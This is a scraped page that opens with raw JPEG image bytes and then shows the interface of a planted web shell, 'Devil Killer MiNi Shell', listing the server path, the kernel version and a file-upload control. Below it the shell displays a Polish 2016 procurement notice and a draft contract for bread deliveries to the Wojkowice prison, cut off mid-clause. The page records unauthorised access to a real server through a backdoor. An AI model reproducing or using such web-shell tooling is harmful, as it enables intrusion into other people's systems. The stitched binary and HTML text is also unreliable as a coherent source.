JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161201/356585-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.sw.gov.pl' target='_blank'>http://www.sw.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 356585 - 2016
              z dnia 2016-12-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wojkowice: Dostaw pieczywa <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakład Karny, krajowy numer identyfikacyjny
              31976000000, ul.
              ul. Sobieskiego 
              298,
              42580  
              Wojkowice, woj.
              śląskie, państwo
              Polska, tel.
              322 961 600, e-mail
              zk_wojkowice@sw.gov.pl, faks
              322 961 613.
              <br />
              Adres strony internetowej (URL): www.sw.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Zakład Karny</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.sw.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostaw pieczywa <br /><b>Numer referencyjny: </b>D/kw 220/10/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Chleb pszenno-żytni, foremka, w opakowaniach foliowych, krojony o masie 0,4 kg - ilość 30000 kilogramów. 2. Chleb pszenny, foremka, w opakowaniach foliowych, krojony o masie 0,4 kg - ilość 2800 kilogramów. 3. Chleb razowy, foremka, w opakowaniach foliowych, krojony o masie 0,4 kg - ilość 400 kilogramów. 4. Bułka tarta, opakowanie o masie 0,5 kg - ilość 200 kilogramów.<br /><br /><b>II.5) Główny kod CPV: </b>15811100-7<br /><b> Dodatkowe kody CPV:</b>15820000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 10<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określił warunków w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określił warunków w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie określił warunków w tym zakresie<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Na podstawie art. 24 ust. 11 ustawy PZP Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP (informacji z sesji otwarcia ofert) przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Wzór oświadczenia o stanowi załącznik nr 5 do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymalny termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">(WZÓR)
UMOWA nr ...........
na sukcesywne dostawy żywności do Oddziału Zewnętrznego w Ciągowicach
zawarta w Wojkowicach dnia ............. 201.. roku
zawarta pomiędzy:
Zakładem Karnym w Wojkowicach z siedzibą w Wojkowicach przy ulicy Sobieskiego 298, legitymującym się numerem identyfikacji podatkowej (NIP) 625-10-63-389, reprezentowanym przez:
Dyrektora Zakładu Karnego w Wojkowicach  płk Macieja Błaszczyszyna (Maciej Błaszczyszyn)
zwanym dalej Zamawiającym lub Stroną
a 
.................................................... z siedzibą w ............................ przy ulicy ......................., legitymującym się numerem identyfikacji podatkowej (NIP) ............................., wpisanym do Krajowego Rejestru Sądowego pod numerem  ..................................... , reprezentowaną/y przez: 
.......................................... - ..............................., legitymująca/y się numerem PESEL................
.......................................... - ..............................., legitymująca/y się numerem PESEL ...................
zwaną/ym dalej Wykonawcą lub Stroną
a Zamawiający i Wykonawca łącznie zwani Stronami

Strony, mając na uwadze wybór najkorzystniejszej oferty w wyniku przeprowadzonego postępowania o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na sukcesywne dostawy żywności  - .........................  prowadzonego pod numerem D/Kw ................., zgodnie postanawiają przyjąć prawa i obowiązki określone w niniejszej umowie. 
§ 1  
OŚWIADCZENIA STRON
1. Zamawiający oświadcza, iż jest jednostką sektora finansów publicznych będącą jednocześnie jednostką organizacyjną Skarbu Państwa.
2. Wykonawca oświadcza, iż jest profesjonalistą w zakresie prowadzonej przez siebie działalności oraz w zakresie zaciągniętych w niniejszej umowie zobowiązań, przez co rozumie się w szczególności, iż posiada odpowiednie zasoby ludzkie i materiałowe do wykonania zobowiązania określonego w § 2 i §3 niniejszej umowy, a ponadto legitymuje się stosownymi uprawnieniami, certyfikatami, zezwoleniami, badaniami i innymi tego typu dokumentami niezbędnymi do prawidłowej realizacji obowiązków wynikających z niniejszej umowy. Wykonawca oświadcza ponadto, iż jest świadomy ciążących na nim obowiązków określonych zarówno właściwymi przepisami prawa jak i wynikających z przeprowadzonego postępowania przetargowego oraz niniejszej umowy.
3. Wykonawca wskazuje, iż zarówno on lub inne podmioty z nim współpracujące przy wykonywaniu postanowień niniejszej umowy posiadają wymagane przez właściwe przepisy prawa koncesje, zgody, pozwolenia, decyzje, certyfikaty i inne podobne potwierdzające lub warunkujące prawo Wykonawcy lub innych podmiotów z nim współpracujących do realizacji zaciągniętych w niniejszej umowie zobowiązań lub których brak może wpłynąć na to prawo.
4. Wykonawca oświadcza, iż dostarczany przezeń Zamawiającemu asortyment posiada stosowne certyfikaty lub inną dokumentację niezbędną dla wprowadzenia dostarczanego asortymentu do obrotu na terenie Rzeczpospolitej Polskiej i gotów jest takowe certyfikaty lub dokumentację okazać Zamawiającemu na każde jego żądanie.
5. Osoba/osoby reprezentujące Wykonawcę i składające swój/swe podpis/y na niniejszej umowie oświadcza/oświadczają, iż jest/są umocowane do działania w imieniu Wykonawcy oraz do zaciągania zobowiązań w jego imieniu w zakresie objętym niniejszą umową.
6. Wykonawca oświadcza, iż jest/nie jest płatnikiem podatku od towarów i usług. 
7. Wykonawca oświadcza, iż jego status jako przedsiębiorcy jest aktywny.  
§ 2  
ZOBOWIĄZANIA WYKONAWCY
1. Wykonawca zobowiązuje się dostarczać w okresie obowiązywania niniejszej umowy asortyment wyszczególniony w załączniku nr . do Specyfikacji Istotnych Warunków Zamówienia określonego powyżej - Formularzu cenowym, stanowiącym integralną część niniejszej umowy, w ilościach i terminie ustalonymi każdorazowo dla poszczególnego asortymentu osobnym Zamówieniem, po cenie jednostkowej dla poszczególnego asortymentu wynikającej z przeprowadzonego postępowania przetargowego i określonej przez Wykonawcę w załączniku do oferty złożonej w toku postępowania przetargowego  Formularzu cenowym.
2. Wykonawca zobowiązany jest do dostarczania asortymentu zawierającego opis opakowania jednostkowego składającego się co najmniej z określenia nazwy producenta, składu, daty produkcji oraz terminu przydatności do spożycia w sposób określający termin końcowy tej przydatności, a  w sytuacjach gdy jest to wymagane przez powszechnie obowiązujące przepisy  także innych oznaczeń i informacji co do dostarczanej żywności. Dostarczany asortyment winien posiadać, o ile jest to wymagane przez właściwe przepisy, stosowną dokumentację, w tym w szczególności Handlowy Dokument Identyfikacyjny.
3. Wykonawca zobowiązuje się dostarczać asortyment na własny koszt i ryzyko, środkiem transportu przystosowanym zgodnie z właściwymi przepisami do przewozu asortymentu będącego przedmiotem niniejszej umowy.
4. Wykonawca zobowiązany jest do niezwłocznego, nie później niż w terminie 3 dni roboczych liczonych od dnia pozyskania wiadomości, poinformowania Zamawiającego, w formie pisemnej pod rygorem nieważności lub za pośrednictwem poczty elektronicznej na adres wskazany w § 8 niniejszej umowy, o zgłoszeniu przez Wykonawcę lub osoby trzecie wniosku o ogłoszenie upadłości Wykonawcy.
§ 3 
ZAMÓWIENIE I REALIZACJA DOSTAW
1. Wykonawca zobowiązany jest do realizacji dostaw poszczególnego asortymentu zgodnie ze składanymi każdorazowo przez Zamawiającego Zamówieniami.
2. Zamówienie opisane w ust. 1 powyżej, określa w szczególności:
1) dzień dostawy,
